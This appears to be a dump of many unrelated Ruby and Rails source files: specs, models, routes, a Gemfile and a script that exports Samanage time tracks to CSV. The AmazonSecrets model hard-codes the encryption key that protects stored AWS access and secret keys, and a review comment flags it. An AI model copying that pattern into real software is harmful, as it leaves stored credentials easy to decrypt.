# `i += 1` — `for` reassigns i on every iteration, so the manual increment
# never had any effect. Rewritten with each_with_index.
def print_tracks tracks
  puts 'Tracks: '
  tracks.each_with_index do |track, i|
    puts '*********************************************'
    puts '**************** Track No. ' + (i + 1).to_s + ' ****************'
    puts 'Track name: ' + track.name
    puts 'Track file location: ' + track.location
  end
end
# Prints one album's header details, then all of its tracks.
def print_album album
  puts '*********************************************'
  puts "Album Title: #{album.title}"
  puts "Album Artist: #{album.artist}"
  puts "Genre: #{album.genre}"
  puts ''
  print_tracks(album.tracks)
end
# Reads in an array of albums from a file and then prints all the albums in the
# array to the terminal
# NOTE(review): despite the comment above, this reads a single album from
# the terminal and prints it — no file I/O is involved here.
def main
  puts "Welcome to the music player"
  album = read_album()
  print_album(album)
end

main
|
# frozen_string_literal: true
require 'rails_helper'
# Spec for EventsHelper: registration override-cost icons, event flag
# badges (catalog / activity feed / visibility / quiet / committees),
# and the indented event-selections listing.
RSpec.describe EventsHelper do
  let(:user) { create(:user) }
  let(:event) { create(:event) }

  describe 'override_icon' do
    let(:reg) { create(:registration, user: user, event: event) }
    # NOTE(review): presumably seeds the generic SEO/AO records the helper
    # relies on — confirm in the shared spec helpers.
    before { generic_seo_and_ao }

    # Unpaid, no override set: duotone (fad) green icon linking to the
    # override-cost form with a "Set" title.
    it 'generates the correct normal icon' do
      expect(reg_override_icon(reg)).to eql(
        "<a href=\"/override_cost/#{reg.payment.token}\"><i class='fad green fa-file-invoice-dollar fa-1x' " \
        "style='' data-fa-transform='' title='Set override cost'></i></a>"
      )
    end

    # Unpaid with an override already set: solid (fas) icon, "Update" title.
    it 'generates the correct set icon' do
      reg.update(override_cost: 1)
      expect(reg_override_icon(reg)).to eql(
        "<a href=\"/override_cost/#{reg.payment.token}\"><i class='fas green fa-file-invoice-dollar fa-1x' " \
        "style='' data-fa-transform='' title='Update override cost'></i></a>"
      )
    end

    # Paid registrations render a gray icon without the link wrapper.
    it 'generates the correct normal paid icon' do
      reg.payment.paid!('1234567890')
      expect(reg_override_icon(reg)).to eql(
        "<i class='fad gray fa-file-invoice-dollar fa-1x' style='' data-fa-transform='' " \
        "title='Registration has already been paid'></i>"
      )
    end

    it 'generates the correct set paid icon' do
      reg.update(override_cost: 1)
      reg.payment.paid!('1234567890')
      expect(reg_override_icon(reg)).to eql(
        "<i class='fas gray fa-file-invoice-dollar fa-1x' style='' data-fa-transform='' " \
        "title='Registration has already been paid'></i>"
      )
    end
  end

  describe 'event_flags' do
    let(:committee_1) { create(:committee) }
    let(:committee_2) { create(:committee, name: 'Vessel Safety Check') }
    # NOTE(review): the flag helpers appear to read this permission ivar
    # directly — confirm against the helper implementation.
    before { @current_user_permitted_event_type = true }

    it 'does not raise any exceptions' do
      expect { event_flags(event) }.not_to raise_error
    end

    it 'generates the correct catalog flag' do
      event.show_in_catalog = true
      expect(event_catalog_flag(event)).to eq(
        '<div class="birmingham-blue" title="This event is shown in the catalog.">' \
        "<i class='fad fa-fw fa-stars fa-1x' style='' data-fa-transform='' title=''></i>" \
        '<small>Catalog</small></div>'
      )
    end

    it 'generates the correct activity flag' do
      event.activity_feed = true
      expect(event_activity_flag(event)).to eq(
        '<div class="birmingham-blue" title="This event is available for display in the activity feed.">' \
        "<i class='fad fa-fw fa-stream fa-1x' style='' data-fa-transform='' title=''></i>" \
        '<small>Activity Feed</small></div>'
      )
    end

    it 'generates the correct invisible flag' do
      event.visible = false
      expect(event_not_visible_flag(event)).to eq(
        '<div class="red" title="This event is not visible to members or the public. Only editors can see it.">' \
        "<i class='fad fa-fw fa-eye-slash fa-1x' style='' data-fa-transform='' title=''></i>" \
        '<small>Not Visible</small></div>'
      )
    end

    it 'generates the correct quiet flag' do
      event.quiet = true
      expect(event_quiet_flag(event)).to eq(
        '<div class="purple" title="This event is not displayed in the schedule. Direct links can still access it.">' \
        "<i class='fad fa-fw fa-face-shush fa-1x' style='' data-fa-transform='' title=''></i>" \
        '<small>Quiet</small></div>'
      )
    end

    it 'generates the correct committees flag with one committee' do
      event.event_type.assign(committee_1)
      expect(event_committees_flag(event)).to eq(
        '<div class="green" title="Will notify the listed committee in addition to the relevant bridge officers.">' \
        "<i class='fad fa-fw fa-envelope fa-1x' style='' data-fa-transform='' title=''></i>" \
        "<small>#{committee_1.name}</small></div>"
      )
    end

    # assign accepts either a committee name or a Committee; each assigned
    # committee yields its own flag div.
    it 'generates the correct committees flag with multiple committees' do
      event.event_type.assign(committee_1.name) # Directly pass in string name
      event.event_type.assign(committee_2) # Pass in actual Committee object
      expect(event_committees_flag(event)).to eq(
        '<div class="green" title="Will notify the listed committee in addition to the relevant bridge officers.">' \
        "<i class='fad fa-fw fa-envelope fa-1x' style='' data-fa-transform='' title=''></i>" \
        "<small>#{committee_1.name}</small></div>" \
        '<div class="green" title="Will notify the listed committee in addition to the relevant bridge officers.">' \
        "<i class='fad fa-fw fa-envelope fa-1x' style='' data-fa-transform='' title=''></i>" \
        "<small>#{committee_2.name}</small></div>"
      )
    end

    # Committees sharing a name collapse into a single flag.
    it 'generates the correct committees flag with duplicate committees' do
      committee_1.name = 'something'
      committee_2.name = 'something'
      event.event_type.assign(committee_1)
      event.event_type.assign(committee_2)
      expect(event_committees_flag(event)).to eq(
        '<div class="green" title="Will notify the listed committee in addition to the relevant bridge officers.">' \
        "<i class='fad fa-fw fa-envelope fa-1x' style='' data-fa-transform='' title=''></i>" \
        "<small>#{committee_1.name}</small></div>"
      )
    end
  end

  describe '#event_selections_indented' do
    # Options are listed beneath their selection's description, indented.
    it 'generates the correct indented string' do
      selection = event.event_selections.create(description: 'An Option')
      selection.event_options.create([{ name: 'One' }, { name: 'Two' }])
      expect(event_selections_indented(event)).to eq("An Option\n One\n Two")
    end
  end
end
|
# json.shoes do
# @shoes.each do |shoe|
# json.set! :id do
# json.extract! :id, :name
# if shoe.photo.attached?
# json.photoUrl url_for(shoe.photo)
# end
# end
# end
# end
# Renders @shoes as a JSON array of shoe attribute objects.
json.array! @shoes do |shoe|
  json.extract! shoe, :id, :name, :price, :brand, :style_code, :colorway, :release_date
  # Guard against shoes without an attached photo — url_for raises for an
  # unattached blob (the earlier commented-out version had this check too).
  json.photoUrl url_for(shoe.photo) if shoe.photo.attached?
end
module Noodle
  # Validates that a node record carries at least one property.
  class MinimumNumberOfNodeProperties < ActiveModel::Validator
    # Adds a strict error (raising ActiveModel::StrictValidationFailed)
    # when the record has no node properties at all.
    def validate(record)
      # empty? reads better than `length < 1` and expresses the intent directly.
      record.errors.add(:empty_value, 'Node must have at least one property', strict: true) if record.node_properties.empty?
    end
  end
end
|
source 'https://rubygems.org'
# Sinatra is a very simple webserver written in Ruby.
# Documentation is here: http://www.sinatrarb.com/intro.html
gem 'sinatra', '~> 1.4.5'
# Rerun causes Sinatra to auto-reload files that you change so that you do not have to restart the server after every
# change.
gem 'rerun', '~> 0.10.0'
# HAML is a simplified method of writing HTML
# Documentation is here: http://haml.info/
# NOTE(review): haml is unpinned, unlike the gems above — consider a
# pessimistic version constraint (e.g. '~> X.Y') for reproducible installs.
gem 'haml'
# Fields:
# user_id: ScalarmUser id who has this secrets
# access_key - actually stored as hashed_access_key
# secret_key - actually stored as hashed_secret_key
#
# NOTE(review): despite the "hashed_" field names, the stored values are
# Base64-encoded *encrypted* strings (they are decrypted back to plaintext
# below) — hashes would not be reversible. The names are misleading but are
# part of the stored schema, so they are kept.
class AmazonSecrets < MongoActiveRecord
  # SECURITY(review): hard-coded, source-controlled encryption key material;
  # consider loading the key from configuration or the environment instead.
  Encryptor.default_options.merge!(:key => Digest::SHA256.hexdigest('QjqjFK}7|Xw8DDMUP-O$yp'))

  # Mongo collection backing this record type.
  def self.collection_name
    'amazon_secrets'
  end

  # Plaintext AWS access key: Base64-decode then decrypt the stored value.
  def access_key
    Base64.decode64(self.hashed_access_key).decrypt
  end

  # Encrypts then Base64-encodes the access key before storage.
  def access_key=(new_access_key)
    self.hashed_access_key = Base64.encode64(new_access_key.encrypt)
  end

  # Plaintext AWS secret key: Base64-decode then decrypt the stored value.
  def secret_key
    Base64.decode64(self.hashed_secret_key).decrypt
  end

  # Encrypts then Base64-encodes the secret key before storage.
  def secret_key=(new_secret_key)
    self.hashed_secret_key = Base64.encode64(new_secret_key.encrypt)
  end
end
# This is the naive implementation of pattern matching and, as the name
# implies, works in quadratic time (comparison sort of all patterns plus a
# linear scan per lookup).
class QuadraticPatternsMatcher
  attr_accessor :patterns

  # patterns - collection of objects responding to #matches?(path) and
  #            #compare_for_best_match(other) (a <=>-style comparator).
  def initialize(patterns)
    @patterns = patterns
  end

  # Returns the best pattern matching path, or nil when none matches.
  def best_match(path)
    quadratic_match_candidates.find { |candidate| candidate.matches?(path) }
  end

  # We sort with compare_for_best_match so that the first match we find is
  # the best one. Memoized: mutate #patterns only before the first lookup.
  def quadratic_match_candidates
    @quadratic_match_candidates ||= patterns.sort { |a, b| a.compare_for_best_match(b) }
  end

  # Backward-compatible alias for the original (misspelled) method name.
  alias_method :quadratitic_match_candidates, :quadratic_match_candidates
end
Rails.application.routes.draw do
  # Admin UI mounted under a non-default path.
  mount RailsAdmin::Engine => '/myapp_admin', as: 'rails_admin'
  # Devise web sessions only (no registrations etc.), with custom
  # login/logout path names at the root.
  devise_for :users, path: '', path_names: { sign_in: 'myapp_login', sign_out: 'myapp_logout' },
             only: [:sessions]
  # API documentation routes (apipie-rails).
  apipie
  # JSON API v1 auth endpoints, handled by custom Devise-scoped controllers.
  namespace :api, defaults: {format: 'json'} do
    namespace :v1 do
      devise_scope :user do
        post '/auth/sign_in', to: 'sessions#create'
        delete '/auth/sign_out', to: 'sessions#destroy'
        post '/auth/passwords', to: 'passwords#create'
        put '/auth/passwords', to: 'passwords#update'
        post '/auth', to: 'registrations#create'
        put '/auth', to: 'registrations#update'
        delete '/auth', to: 'registrations#destroy'
      end
    end
  end
end
|
# Join model linking a Guard to a Worker.
# NOTE(review): pure association holder with no validations or behavior;
# presumably represents a worker-type assignment — confirm against schema.
class WorkerType < ApplicationRecord
  belongs_to :guard
  belongs_to :worker
end
|
require 'rails_helper'

# Request spec for the V1 users index endpoint.
RSpec.describe "V1 Users API", type: :request do
  # Three persisted users so the index returns a known collection size.
  let!(:users) { create_list(:user, 3) }
  # Parsed JSON body of the most recent response.
  let(:json) { JSON.parse(response.body) }

  context "when request the information for users" do
    it "returns a collection of all users that exists" do
      get api_v1_users_path

      expect(response.status).to eq(200)
      expect(json['data'].length).to eq(3)
    end
  end
end
|
require 'rails_helper'

# View spec for the user edit form: persists a user, renders the edit
# template, and checks the form exposes an input per editable attribute.
RSpec.describe "users/edit", type: :view do
  before(:each) do
    @user = assign(:user, User.create!(
      name: "MyString",
      email: "MyString",
      password: "MyString",
      age: 1,
      gender: 1,
      prefecture: "",
      home_prefecture: nil,
      job: "MyString",
      married: "",
      introduction: "MyString",
      winelevel: 1.5,
      winenum: 1,
      follow: 1,
      follower: 1,
      ranking: 1
    ))
  end

  it "renders the edit user form" do
    render

    assert_select "form[action=?][method=?]", user_path(@user), "post" do
      # Every field follows the input#user_<attr>[name="user[<attr>]"]
      # pattern, so one loop replaces fifteen repeated assertions.
      %w[
        name email password age gender prefecture home_prefecture_id job
        married introduction winelevel winenum follow follower ranking
      ].each do |attr|
        assert_select "input#user_#{attr}[name=?]", "user[#{attr}]"
      end
    end
  end
end
require 'samanage'
require 'csv'
# CLI usage: ruby <script> <api_token> <input> <datacenter>
api_token = ARGV[0]
input = ARGV[1] # NOTE(review): read but never used below — confirm whether it is still needed
datacenter = ARGV[2]
# Authenticated Samanage API client used by the export loop below.
@samanage = Samanage::Api.new(token: api_token, datacenter: datacenter)
# One output file per run, timestamped to avoid clobbering earlier reports.
REPORT_FILENAME = "Report - Time Tracks - #{DateTime.now.strftime("%b-%m-%Y %H%M")}.csv"
# Appends a single row to the report CSV, writing the header row first
# when the file is new.
#
# row      - Array of cell values.
# filename - CSV path (defaults to the per-run REPORT_FILENAME).
# headers  - Array of column names; only written when the file has no rows.
def log_to_csv(row: , filename: REPORT_FILENAME, headers: [])
  # File.exist? — File.exists? was deprecated and removed in Ruby 3.2.
  write_headers = !File.exist?(filename)
  # NOTE(review): the write_headers option is inert without a :headers
  # option; the csv.count guard below is what actually emits the header row.
  CSV.open(filename, 'a+', write_headers: write_headers, force_quotes: true) do |csv|
    csv << headers if csv.count.eql? 0
    csv << row
  end
end
# Formats a minute count as "h:mm" — hours unpadded, minutes zero-padded.
def convert_time(minutes)
  hours, mins = minutes.divmod(60)
  format('%d:%02d', hours, mins)
end
# Export one CSV row per time-track entry on recently updated incidents.
# NOTE(review): 'updated[]': 30 presumably filters to incidents updated in
# the last 30 days — confirm against the Samanage API filter syntax.
@samanage.incidents(options: {verbose: true, 'updated[]': 30}).each do |incident|
  # Skip incidents without time tracks to avoid a needless API call.
  unless incident['time_tracks'].to_a.empty?
    @samanage.time_tracks(incident_id: incident['id']).each do |time_track|
      # Placeholder left for per-entry filtering:
      # if some_custom_validation
      #   next
      # end
      time_entered = convert_time(time_track['minutes'].to_i)
      # dig returns nil for any missing nested key, so absent associations
      # become blank cells rather than raising.
      row = {
        'Time Track Entered By' => time_track.dig('creator','email'),
        'Time Entered (h:m)' => time_entered,
        'Time Entered At' => time_track['created_at'],
        'Incident URL' => "https://app#{datacenter}.samanage.com/incidents/#{incident['id']}",
        'Incident Number' => incident['number'],
        'Incident State' => incident.dig('state'),
        'Incident Created At' => incident['created_at'],
        'Incident Updated At' => incident['updated_at'],
        'Incident Category' => incident.dig('category','name'),
        'Incident Subcategory' => incident.dig('subcategory','name'),
        'Incident Site' => incident.dig('site','name'),
        'Incident Department' => incident.dig('department','name'),
        'Incident Assignee Email' => incident.dig('assignee','email'),
        'Incident Assignee Name' => incident.dig('assignee','name'),
        'Incident Requester Email' => incident.dig('requester','email'),
        'Incident Requester Name' => incident.dig('requester','name'),
        # Add / remove columns here from time track or parent incident data.
      }
      log_to_csv(row: row.values, headers: row.keys)
    end
  end
end
# Clinical study model: belongs to a study group; has sites, enrollments
# and (through enrollments) subjects, one side-effect record and one
# attached image. Queues a success email after every save.
class Study < ApplicationRecord
  validates :name, presence: true
  validates :drug, presence: true
  # Modern `validates ... numericality:` form, consistent with the presence
  # validations above (validates_numericality_of is the legacy API).
  validates :age_limit, numericality: { greater_than: 7 }
  validates :phase, numericality: { less_than: 6 }

  belongs_to :study_group
  has_many :sites
  has_many :enrollments
  has_many :subjects, through: :enrollments
  has_one :side_effect
  has_one_attached :my_image

  after_save :success_study

  # Phase >= 4 drugs are considered usable; below 4 still under trial.
  scope :usable_drugs, -> { where('phase>=4') }
  scope :under_trials, -> { where('phase<4') }

  # Queues the study success email (delivered asynchronously; see below).
  def success_study
    StudyMailer.delay.success_email(self)
  end
  # delayed_job wrapper: runs success_study in the background at priority 0.
  handle_asynchronously :success_study, priority: 0
end
|
# Joins a User to a Role.
class Assignment < ActiveRecord::Base
  belongs_to :user
  belongs_to :role

  # Lambda scope: a bare `where` argument is evaluated once at class-load
  # time and is deprecated/removed in modern Rails; the lambda defers
  # evaluation to each call.
  scope :registered, -> { where(role_id: 1) }
end
|
# Join model linking a Provider to a Phone.
# NOTE(review): association holder only, no validations — confirm whether
# uniqueness of the (provider, phone) pair is enforced elsewhere (e.g. DB).
class ProviderPhone < ApplicationRecord
  belongs_to :phone
  belongs_to :provider
end
|
# Thin repository over the `categories` table of a Sequel-style database.
class CategoryInventory
  attr_reader :database

  # database - handle responding to #from(table) and returning a dataset
  #            that supports #insert and #map.
  def initialize(database)
    @database = database
  end

  # Dataset scoped to the categories table.
  def dataset
    database.from(:categories)
  end

  # Inserts the given category attributes; returns whatever #insert returns.
  def create(category)
    dataset.insert(category)
  end

  # Returns every stored row wrapped in a Category.
  def all
    dataset.map { |row| Category.new(row) }
  end
end
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.